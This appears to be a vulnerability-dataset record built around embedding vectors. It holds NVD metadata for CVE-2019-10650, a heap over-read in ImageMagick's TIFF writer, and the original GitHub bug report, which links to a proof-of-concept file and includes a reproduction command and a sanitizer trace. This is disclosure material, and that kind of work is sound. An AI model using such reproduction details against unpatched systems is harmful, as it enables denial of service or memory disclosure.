-0.002127469517290592, 0.013522641733288765, -0.0011854037875309587, 0.005735824815928936, -0.005916590336710215, -0.019314086064696312, -0.004779853858053684, -0.012521479278802872, -0.01857711933553219, 0.018493689596652985, -0.023861031979322433, 0.004967572167515755, 0.005023192148655653, 0.0031964187510311604, 0.0112422164529562, -0.01660260558128357, -0.006601412780582905, 0.008148347958922386, -0.01156898494809866, -0.00493280915543437, 0.0024368565063923597, -0.013494831509888172, -0.0003317653317935765, -0.016435746103525162, 0.0067926072515547276, 0.021914327517151833, -0.0010741635924205184, -0.014544661156833172, 0.0071019940078258514, 0.01647746004164219, 0.017214426770806313, 0.0037856444250792265, 0.025168104097247124, 0.0012888225028291345, -0.001751164672896266, 0.024347707629203796, 0.01104059349745512, 0.006059116683900356, -0.009684853255748749, -0.018118254840373993, -0.016421839594841003, -0.002290853764861822, 0.016366221010684967, 0.011520317755639553, 0.022039473056793213, 0.012917772866785526, -0.0064415051601827145, 0.0005488141323439777, -0.01371731236577034, -0.035068485885858536, -0.0024299039505422115, 0.014051033183932304, 0.02324921078979969, -0.010310580022633076, -0.015281627885997295, 0.02062116004526615, -0.000556635728571564, 0.00978914089500904, -0.011638510040938854, -0.01163155771791935, -0.01657479628920555, 0.00993514433503151, 0.017158806324005127, 0.0032016332261264324, 0.011019736528396606, 0.009552755393087864, -0.017325667664408684, 0.004567802418023348, 0.024862194433808327, 0.006799559574574232, 0.01122831180691719, -0.0007843305938877165, 0.013939792290329933, -0.002469880972057581, -0.016630416736006737, -0.006281597074121237, -0.008711501024663448, 0.00837082788348198, -0.0175064317882061, -0.005544630810618401, -0.004588659852743149, -0.0068134646862745285, 0.023318735882639885, 0.004421799443662167, -0.011151834391057491, 0.0037022142205387354, 0.010095051489770412, 0.019286276772618294, 0.0057288724929094315, 0.005457724444568157, -0.011541174724698067, 0.01815996877849102, -0.0014582900330424309, -0.008349970914423466, 0.022790344431996346, -0.02508467435836792, 0.00532215042039752, 0.007988439872860909, 0.011117071844637394, -0.00875321589410305, -0.0030417253728955984, 0.0017442122334614396, 0.019814668223261833, -0.0034727812744677067, -0.020078863948583603, 0.008224825374782085, -0.013432258740067482, 0.019550472497940063, 0.010122861713171005, 0.0005140515859238803, 0.0030921311117708683, 0.0035944501869380474, 0.008134442381560802, -0.005544630810618401, 0.012841295450925827, -0.024528473615646362, 0.0061008320190012455, 0.0006600543856620789, 0.02062116004526615, -0.006966419983655214, -0.004296654369682074, 0.03974057734012604, -0.020996594801545143, -0.005353436339646578, -0.03239871934056282, -0.00039890053449198604, 0.00011938771785935387, -0.011986135505139828, 0.013647787272930145, -0.013981507159769535, 0.005495963152498007, -0.0039246948435902596, 0.0005822731181979179, -0.0026749800890684128, -0.0036744042299687862, 0.020023243501782417, -0.004341845400631428, -0.019175035879015923, 0.0062468345277011395, 0.0060104490257799625, -0.02039867825806141, 0.0046790423803031445, -0.015045242384076118, 0.021191265434026718, -0.003820406971499324, 0.010818113572895527, 0.003796073142439127, -0.011582889594137669, 0.0013757288688793778, -0.008739311248064041, 0.009976859204471111, -0.006987277418375015, -0.0037856444250792265, -0.0011219620937481523, 0.01549020316451788, -0.0031755613163113594, 0.01064430084079504, -0.0132653983309865, 0.00810663215816021, 0.0027949109207838774, 0.015170387923717499, -0.012792627327144146, -0.013988460414111614, 0.0224844329059124, 0.010421819984912872, 0.00948323030024767, 0.0020231818780303, -0.003750881878659129, -0.01777062751352787, -0.03214842826128006, -0.006590984296053648, 0.00695599103346467, 0.006177309434860945, -0.01567096821963787, -0.00493628578260541, -0.005353436339646578, 0.022553957998752594, 0.031063836067914963, -0.021886516362428665, 0.018994271755218506, 0.0023395211901515722, -0.010046384297311306, -0.03248215094208717, -0.007870246656239033, 0.006222500931471586, 0.02141374535858631, 0.005471629090607166, -0.018104348331689835, -0.0122920460999012, 0.003820406971499324, -0.0027045283932238817, 0.008078821934759617, -0.007411380764096975, 0.016241075471043587, 0.00033046171301975846, 0.02249833755195141, 0.02249833755195141, -0.014231798239052296, -0.025279344990849495, 0.006736986804753542, 0.013828552328050137, -0.006462362594902515, -0.008273492567241192, 0.005495963152498007, -0.005228291265666485, 0.0026489081792533398, 0.0017650697845965624, -0.008725406602025032, 0.011416029185056686, -0.01842416450381279, 0.001194963464513421, 0.012208616361021996, -0.006935133598744869, 0.009399800561368465, -0.03162003681063652, -0.01817387342453003, 0.010991926304996014, -0.014961812645196915, 0.026739371940493584, 0.012750912457704544, 0.004393989685922861, 0.004581707529723644, -0.026586417108774185, -0.0005262185004539788, -0.020843639969825745, 0.00014871863822918385, -0.009239892475306988, -0.0005953090731054544, -0.0007052457658573985, -0.0014487303560599685, 0.006636175327003002, 0.024375516921281815, -0.004400942008942366, 0.005099669564515352, 0.009441515430808067, -0.023457786068320274, 0.016519175842404366, -0.01788186840713024, 0.014009317383170128, 0.018604930490255356, -0.03915656358003616, -0.01777062751352787, 0.009636186063289642, -0.0062989783473312855, -0.02483438327908516, -0.003907313570380211, -0.027671009302139282, 0.0016181978862732649, -0.02181699126958847, 0.00837082788348198, -0.003318087663501501, -0.0032815870363265276, -0.0005635882262140512, 0.019300181418657303, 0.02142765186727047, 0.009420657530426979, -0.005228291265666485, -0.008725406602025032, -0.005207433830946684, 0.007564336061477661, 0.004025506321340799, 0.017061471939086914, 0.016018593683838844, -0.01072077825665474, 0.0006670068833045661, 0.005044049583375454, 0.014753236435353756, 0.013209778815507889, -0.013154158368706703, 0.0077729118056595325, -0.010463534854352474, 0.0019032509298995137, 0.002527239266782999, 0.012166901491582394, 0.0111657390370965, 0.008057964965701103, -0.0015721374657005072, 0.020690685138106346, -0.00876016914844513, 0.01739519275724888, -0.0032294432166963816, 0.004383560735732317, -0.0038864559028297663, 0.008287398144602776, -0.0022978060878813267, -0.004818093031644821, 0.008426448330283165, 0.0008125751628540456, 0.004446133505553007, 0.03437323495745659, 0.013300160877406597, -0.02666984684765339, 0.0029078894294798374, -0.008808836340904236, -0.014106652699410915, 0.007126328069716692, -0.02260957844555378, 0.00138094334397465, 0.01005333662033081, 0.00303477281704545, 0.008190062828361988, -0.008850551210343838, 0.012688339687883854, 0.0035179725382477045, 0.009761330671608448, -0.019619997590780258, -0.010692968033254147, -0.01802091859281063, -0.005968734156340361, -0.018090443685650826, -0.010074194520711899, -0.01189575344324112, -0.019800763577222824, 0.006347646005451679, -0.009107794612646103, 0.0006035651895217597, 0.010553917847573757, 0.024500662460923195, 0.007731196470558643, -0.003290277672931552, -0.0066883196122944355, 0.008502925746142864, -0.019272372126579285, 0.0032277051359415054, 0.012236426584422588, 0.02405570261180401, 0.0062468345277011395, -0.019772952422499657, 0.00392121821641922, 0.003431066172197461, -0.013418354094028473, -0.016630416736006737, 0.0050301444716751575, -0.014711521565914154, 0.0024229513946920633, -0.002676718169823289, 0.015879543498158455, -0.002078802092000842, 0.011993088759481907, -0.003990743774920702, 0.0010506988037377596, 0.001993633573874831, 0.025932880118489265, 0.02875560149550438, 0.011666320264339447, -0.01672775112092495, -0.0030052245128899813, 0.017033660784363747, 0.009740473702549934, -0.008120537735521793, 0.017923584207892418, -0.00967094860970974, 0.01815996877849102, -0.002226542914286256, 0.0028522692155092955, -0.011137928813695908, 0.019772952422499657, -0.002786220284178853, 0.002662813290953636, -0.008190062828361988, -0.023443881422281265, 0.022832058370113373, -0.0015886496985331178, -0.019286276772618294, -0.037821680307388306, 0.006785654462873936, -0.003959457390010357, -0.005652394611388445, -0.01592125929892063, -0.006410218775272369, -0.006636175327003002, -0.024013986811041832, -0.001488707261160016, 0.00011667189392028376, 0.0034588761627674103, 0.012785675004124641, -0.005791444797068834, 0.00027744879480451345, 0.007084612734615803, 0.010164576582610607, 0.0034171610604971647, -0.016672130674123764, 0.01674165576696396, -0.008669786155223846, -0.005169194657355547, -0.01672775112092495, -0.004818093031644821, 0.019550472497940063, 0.014864477328956127, -0.0010168052976951003, 0.006702224258333445, 0.00473466282710433, -0.009066079743206501, -0.003000010270625353, -0.005516820587217808, -0.006910800002515316, -0.004230605438351631, -0.012173853814601898, -0.005398627836257219, 0.00037565306411124766, 0.010248007252812386, -0.014475136063992977, -0.022331478074193, -0.015253817662596703, 0.014906192198395729, 0.022553957998752594, 0.020704589784145355, 0.006910800002515316, -0.0015269460855051875, 0.0012114756973460317, 0.021232981234788895, -0.0003530574031174183, 0.002577645005658269, 0.0041228411719202995, 0.02911713346838951, 0.009511040523648262, 0.017339572310447693, -0.005054478533565998, -0.004793758969753981, 0.016115929931402206, 0.008801884017884731, -0.01606030948460102, 0.0003321998519822955, 0.008057964965701103, -0.04635937139391899, -0.000305041583487764, 0.0030417253728955984, 0.027796154841780663, 0.020092768594622612, 0.00018956467101816088, -0.0020092767663300037, -0.0023534263018518686, 0.010713825933635235, 0.0044808960519731045, -0.009448467753827572, -0.02089926041662693, -0.003955981228500605, 0.03737672045826912, -0.007710339035838842, -0.02614145539700985, 0.028783412650227547, -0.00843340065330267, -0.011297836899757385, 0.009837809018790722, 0.003969885874539614, -0.0011384743265807629, 0.013557404279708862, -0.0068864659406244755, -0.005718443542718887, 0.018896935507655144, 0.02301282435655594, -0.0013592166360467672, -0.0053499601781368256, 0.0000613233569310978, -0.019759047776460648, -0.019633902236819267, 0.03398389369249344, 0.00249769096262753, 0.006782178301364183, -0.010894590988755226, -0.01144383940845728, -0.0035805453080683947, 0.018716169521212578, -0.009768283925950527, 0.002494214801117778, -0.019772952422499657, 0.011763655580580235, -0.005217862315475941, -0.003132107900455594, -0.021344220265746117, 0.01778453402221203, 0.01658870093524456, 0.00928160734474659, -0.005711491219699383, -0.019161131232976913, 0.0015017432160675526, 0.028296735137701035, 0.012257283553481102, -0.0012662267545238137, -0.005044049583375454, -0.0011845347471535206, -0.0423269122838974, -0.00041563002741895616, -0.004546944983303547, 0.008329113014042377, 0.019619997590780258, 0.016950231045484543, -0.0046373275108635426, 0.007953677326440811, -0.010727730579674244, -0.0003795638622250408, 0.004950190894305706, 0.0006504947086796165, 0.0027514577377587557, 0.017311763018369675, -0.006093879230320454, 0.01215299591422081, -0.0026141456328332424, 0.0070602791383862495, -0.0046581849455833435, -0.01661651022732258, 0.020343059673905373, 0.01254233717918396, -0.0024611903354525566, -0.00907998438924551, -0.009232940152287483, -0.03829445317387581, 0.022414907813072205, -0.01033143699169159, -0.005610679741948843, 0.002097921445965767, 0.009698758833110332, 0.011464697308838367, 0.01827120967209339, 0.0018389401957392693, 0.004042887594550848, 0.003973362501710653, 0.01129088457673788, 0.0005431652534753084, -0.0003852127701975405, 0.020009338855743408, 0.00007419637404382229, -0.008968744426965714, -0.004039410967379808, -0.004696423653513193, -0.014781046658754349, -0.0024281658697873354, -0.0051935287192463875, 0.0014035389758646488, -0.028505312278866768, 0.008600261062383652, 0.0006982932100072503, -0.019230656325817108, 0.017742818221449852, 0.0059965443797409534, -0.008176157251000404, 0.010727730579674244, -0.006983801256865263, 0.012938630767166615, 0.0009655305184423923, 0.012319856323301792, 0.020343059673905373, -0.015990784391760826, 0.004922380670905113, -0.003969885874539614, -0.014203988015651703, 0.015754399821162224, -0.019522661343216896, -0.017158806324005127, 0.01057477481663227, -0.010373152792453766, -0.010595632717013359, 0.019161131232976913, 0.01292472518980503, 0.020023243501782417, 0.0007643421413376927, -0.0076894816011190414, 0.007307093124836683, -0.01142993476241827, 0.01365473959594965, 0.01012981403619051, 0.014322181232273579, 0.010227149352431297, -0.012570147402584553, 0.002363855019211769, -0.005426438059657812, -0.010102003812789917, 0.04385646432638168, 0.0029617713298648596, 0.01371731236577034, 0.008252635598182678, 0.00013416181900538504, -0.0043592266738414764, -0.002049253787845373, -0.012451954185962677, -0.0006683105020783842, 0.010630395263433456, -0.012987297959625721, -0.004984953440725803, 0.010303626768290997, -0.023986177518963814, -0.006212071981281042, -0.003855169517919421, -0.006166880950331688, 0.01685289666056633, 0.0060104490257799625, -0.010435724630951881, 0.008224825374782085, 0.003747405484318733, 0.0031008217483758926, 0.0020874927286058664, 0.00100550742354244, 0.00999076385051012, -0.00008565715688746423, -0.026836708188056946, 0.009455420076847076, -0.02206728234887123, 0.0017155330860987306, 0.0020909688901156187, -0.009086936712265015, 0.014141415245831013, 0.0065145064145326614, 0.014711521565914154, 0.010692968033254147, 0.011534222401678562, 0.006239882204681635, -0.012333761900663376, 0.00249769096262753, 0.015851734206080437, -0.017144901677966118, -0.016519175842404366, 0.01129088457673788, 0.002812292193993926, 0.006743939593434334, 0.015712684020400047, 0.001885869656689465, 0.021107835695147514, 0.010713825933635235, -0.003768263151869178, -0.007946725003421307, 0.03715423867106438, -0.0031842519529163837, 0.007230615708976984, 0.017144901677966118, -0.01096411608159542, -0.004456561990082264, -0.015587538480758667, -0.005339531693607569, -0.010136767290532589, -0.011562032625079155, 0.006285073701292276, -0.019161131232976913, 0.0025081196799874306, -0.00392121821641922, 0.016491364687681198, -0.004414847120642662, 0.0213164109736681, -0.0027045283932238817, 0.002841840498149395, -0.004515658598393202, 0.014975717291235924, 0.002956557087600231, -0.006615317892283201, 0.0062051196582615376, -0.021511081606149673, 0.010352294892072678, -0.005774063523858786, 0.0003886890481226146, -0.023193590342998505, 0.0023012824822217226, -0.0049049993976950645, -0.0013887648237869143, 0.0015634468290954828, -0.011701082810759544, 0.003584021469578147, 0.004463514778763056, 0.01110316626727581, 0.01661651022732258, 0.004675566218793392, -0.007446143310517073, -0.00463385134935379, 0.011137928813695908, -0.004765949212014675, -0.0017850581789389253, -0.009052174165844917, 0.003006962826475501, -0.00973352137953043, 0.00541948527097702, -0.0024559758603572845, -0.012041755951941013, -0.00044800268369726837, 0.0015747445868328214, 0.007508716080337763, 0.010755540803074837, -0.01385636255145073, -0.00855854619294405, 0.0014808856649324298, 0.008718453347682953, -0.001221035490743816, -0.011916610412299633, 0.001971038058400154, -0.00046886023483239114, -0.014085795730352402, 0.0018493690295144916, -0.0038899320643395185, 0.01437780074775219, -0.004675566218793392, -0.0017424740362912416, -0.0045121824368834496, 0.015017432160675526, 0.019828572869300842, 0.004908475559204817, -0.004251462873071432, 0.007487858645617962, 0.005815778858959675, 0.008927029557526112, 0.014530756510794163, 0.002996533876284957, -0.011499459855258465, 0.015879543498158455, 0.01379378978163004, 0.020982690155506134, 0.013884172774851322, -0.018326830118894577, 0.0171170923858881, 0.0192167516797781, 0.006747415754944086, 0.016268884763121605, 0.06268387287855148, -0.00972656812518835, -0.013946744613349438, 0.004529563710093498, 0.005256101489067078, 0.0015764827840030193, 0.0026784564834088087, 0.006187738385051489, -0.01345311664044857, 0.018132159486413002, -0.002820983063429594, 0.03056325577199459, 0.008920076303184032, -0.010213244706392288, 0.005986115429550409, -0.015559728257358074, 0.026030216366052628, -0.00281055411323905, 0.0019623474217951298, -0.017965298146009445, 0.011527270078659058, 0.0013166324933990836, 0.0092190345749259, -0.0066883196122944355, 0.016032500192523003, 0.017436906695365906, -0.024514567106962204, 0.0018632740247994661, -0.0019258466782048345, 0.007786816917359829, -0.0033372072502970695, 0.005631537176668644, -0.0012349404860287905, 0.013647787272930145, 0.007286235690116882, 0.01561534870415926, -0.020718494430184364, -0.009427609853446484, 0.0028331498615443707, 0.010282769799232483, 0.03517972677946091, -0.011610699817538261, -0.00803015474230051, 0.023958366364240646, -0.00843340065330267, -0.0011741059133782983, 0.009573613293468952, 0.0007317521958611906, 0.012813485227525234, -0.005652394611388445, -0.031036026775836945, 0.026572512462735176, 0.0021969948429614305, -0.0006917752325534821, 0.016268884763121605, 0.012771770358085632, -0.009775236248970032, 0.011645462363958359, 0.00933027546852827, -0.0007495680474676192, -0.02572430483996868, -0.0024333803448826075, 0.03131412714719772 ]
23
CVE-2019-10650
2019-03-30T14:29:00.303000
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00010.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/107646" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1532" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/bugtraq/2019/Apr/37" }, { "source": "[email protected]", "tags": null, "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2019/dsa-4436" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-36:q16:*:*:*:*:*:*", "matchCriteriaId": "0DE4BD49-D481-47E8-B2E3-61482590D669", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1532
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [Y] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in function WriteTIFFImage of coders/tiff.c. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=1VPmM34DHDhFYJCMKvRYIAH4iT14hVsOE) magick convert $poc /dev/null `=================================================================` `==18861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b6b8 at pc 0x7fef0e998935 bp 0x7ffec33e6c90 sp 0x7ffec33e6438` `READ of size 512 at 0x60200000b6b8 thread T0` ` #0 0x7fef0e998934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)` ` #1 0x7fef0dfa102b (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x1802b)` ` #2 0x7a392b in WriteTIFFImage coders/tiff.c:4309` ` #3 0x84807b in WriteImage MagickCore/constitute.c:1159` ` #4 0x848da0 in WriteImages MagickCore/constitute.c:1376` ` #5 0xbefa57 in ConvertImageCommand MagickWand/convert.c:3305` ` #6 0xcdbba8 in MagickCommandGenesis MagickWand/mogrify.c:184` ` #7 0x40fff1 in MagickMain utilities/magick.c:149` ` #8 0x4101d2 in main utilities/magick.c:180` ` #9 0x7fef0a20682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #10 0x40fb08 in _start (/home/ImageMagick_as/utilities/magick+0x40fb08)` `` `0x60200000b6b8 is located 0 bytes to the right of 8-byte region [0x60200000b6b0,0x60200000b6b8)` `allocated by thread T0 here:` ` #0 0x7fef0e9a4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)` ` #1 0x7fef0df923d4 (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x93d4)` `` `SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy` `Shadow bytes around the buggy address:` ` 0x0c047fff9680: fa fa fd fd fa fa 00 07 fa fa 00 04 fa fa 00 04` ` 0x0c047fff9690: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04` ` 0x0c047fff96a0: fa fa fd fa fa fa 02 fa fa fa 00 03 fa fa 00 04` ` 0x0c047fff96b0: fa fa 05 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa` ` 0x0c047fff96c0: fa fa fd fd fa fa fd fa fa fa fd fa fa fa 00 00` `=>0x0c047fff96d0: fa fa 00 fa fa fa 00[fa]fa fa 00 fa fa fa 00 fa` ` 0x0c047fff96e0: fa fa 00 fa fa fa 00 00 fa fa fd fa fa fa fd fa` ` 0x0c047fff96f0: fa fa 00 00 fa fa 02 fa fa fa 00 03 fa fa 00 04` ` 0x0c047fff9700: fa fa 05 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa` ` 0x0c047fff9710: fa fa 00 fa fa fa fd fa fa fa fd fa fa fa fd fa` ` 0x0c047fff9720: fa fa fd fa fa fa fa fa fa fa fa fa fa fa fd fa` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==18861==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-36 Q16 x86_64 2019-03-28 https://imagemagick.org Copyright: ? 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.2 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in WriteTIFFImage of coders/tiff.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1532/comments
5
2019-03-28T15:33:16
2019-05-18T13:35:30Z
https://github.com/ImageMagick/ImageMagick/issues/1532
426,560,687
1,532
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow in WriteTIFFImage of coders/tiff.c Issue date: --- start body --- ### Prerequisites - [Y] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in function WriteTIFFImage of coders/tiff.c. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=1VPmM34DHDhFYJCMKvRYIAH4iT14hVsOE) magick convert $poc /dev/null `=================================================================` `==18861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b6b8 at pc 0x7fef0e998935 bp 0x7ffec33e6c90 sp 0x7ffec33e6438` `READ of size 512 at 0x60200000b6b8 thread T0` ` #0 0x7fef0e998934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)` ` #1 0x7fef0dfa102b (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x1802b)` ` #2 0x7a392b in WriteTIFFImage coders/tiff.c:4309` ` #3 0x84807b in WriteImage MagickCore/constitute.c:1159` ` #4 0x848da0 in WriteImages MagickCore/constitute.c:1376` ` #5 0xbefa57 in ConvertImageCommand MagickWand/convert.c:3305` ` #6 0xcdbba8 in MagickCommandGenesis MagickWand/mogrify.c:184` ` #7 0x40fff1 in MagickMain utilities/magick.c:149` ` #8 0x4101d2 in main utilities/magick.c:180` ` #9 0x7fef0a20682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #10 0x40fb08 in _start (/home/ImageMagick_as/utilities/magick+0x40fb08)` `` `0x60200000b6b8 is located 0 bytes to the right of 8-byte region [0x60200000b6b0,0x60200000b6b8)` `allocated by thread T0 here:` ` #0 0x7fef0e9a4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)` ` #1 0x7fef0df923d4 (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x93d4)` `` `SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy` `Shadow bytes around the buggy address:` ` 0x0c047fff9680: fa fa fd fd fa fa 00 07 fa fa 00 04 fa fa 00 04` ` 0x0c047fff9690: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04` ` 0x0c047fff96a0: fa fa fd fa fa fa 02 fa fa fa 00 03 fa fa 00 04` ` 0x0c047fff96b0: fa fa 05 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa` ` 0x0c047fff96c0: fa fa fd fd fa fa fd fa fa fa fd fa fa fa 00 00` `=>0x0c047fff96d0: fa fa 00 fa fa fa 00[fa]fa fa 00 fa fa fa 00 fa` ` 0x0c047fff96e0: fa fa 00 fa fa fa 00 00 fa fa fd fa fa fa fd fa` ` 0x0c047fff96f0: fa fa 00 00 fa fa 02 fa fa fa 00 03 fa fa 00 04` ` 0x0c047fff9700: fa fa 05 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa` ` 0x0c047fff9710: fa fa 00 fa fa fa fd fa fa fa fd fa fa fa fd fa` ` 0x0c047fff9720: fa fa fd fa fa fa fa fa fa fa fa fa fa fa fd fa` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` ` Global init order: f6` ` Poisoned by user: f7` ` Container overflow: fc` ` Array cookie: ac` ` Intra object redzone: bb` ` ASan internal: fe` `==18861==ABORTING` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-36 Q16 x86_64 2019-03-28 https://imagemagick.org Copyright: ? 1999-2019 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib - Environment (Operating system, version and so on): Distributor ID: Ubuntu Description: Ubuntu 16.04.2 LTS Release: 16.04 Codename: xenial - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
4,607
[ -0.03754886984825134, 0.002785290591418743, -0.002006854396313429, 0.022164082154631615, 0.038363438099622726, 0.039677251130342484, -0.01735551282763481, 0.034080393612384796, -0.012763725593686104, 0.050844691693782806, -0.0013606210704892874, -0.005071330815553665, -0.0010157442884519696, 0.029797354713082314, -0.024318739771842957, -0.0004918599734082818, 0.0009434843668714166, 0.019168579950928688, -0.02271588332951069, 0.0013926452957093716, 0.002139878226444125, -0.019378790631890297, -0.024936234578490257, 0.024082252755761147, -0.0075938585214316845, 0.008277042768895626, -0.014451979659497738, 0.0055771502666175365, 0.0085595129057765, 0.0009065332706086338, 0.022899817675352097, 0.0494520477950573, -0.007363940589129925, 0.0029298104345798492, 0.02971852570772171, 0.008914243429899216, 0.01664605364203453, 0.09454222023487091, -0.004529381636530161, 0.015148302540183067, -0.002473259111866355, -0.0755707174539566, 0.005245411768555641, 0.014714743010699749, -0.018918955698609352, -0.003872473491355777, 0.00011649855878204107, -0.02737993188202381, -0.020653191953897476, 0.033108171075582504, 0.007797499652951956, -0.018826987594366074, -0.017881039530038834, -0.031163722276687622, -0.001054337597452104, -0.013184146955609322, 0.042094673961400986, 0.03163669630885124, 0.023990286514163017, -0.00724569708108902, -0.03765397518873215, 0.04695579409599304, 0.023793213069438934, 0.024686608463525772, -0.021047336980700493, -0.029140446335077286, 0.002272902289405465, 0.012376150116324425, -0.015476755797863007, 0.028247050940990448, -0.014162939973175526, -0.043750084936618805, 0.019497035071253777, 0.04756015166640282, 0.00612895330414176, 0.007528167683631182, 0.040623199194669724, 0.014136663638055325, -0.03463219851255417, 0.02108675241470337, -0.05807068198919296, 0.04262020066380501, -0.0377853587269783, 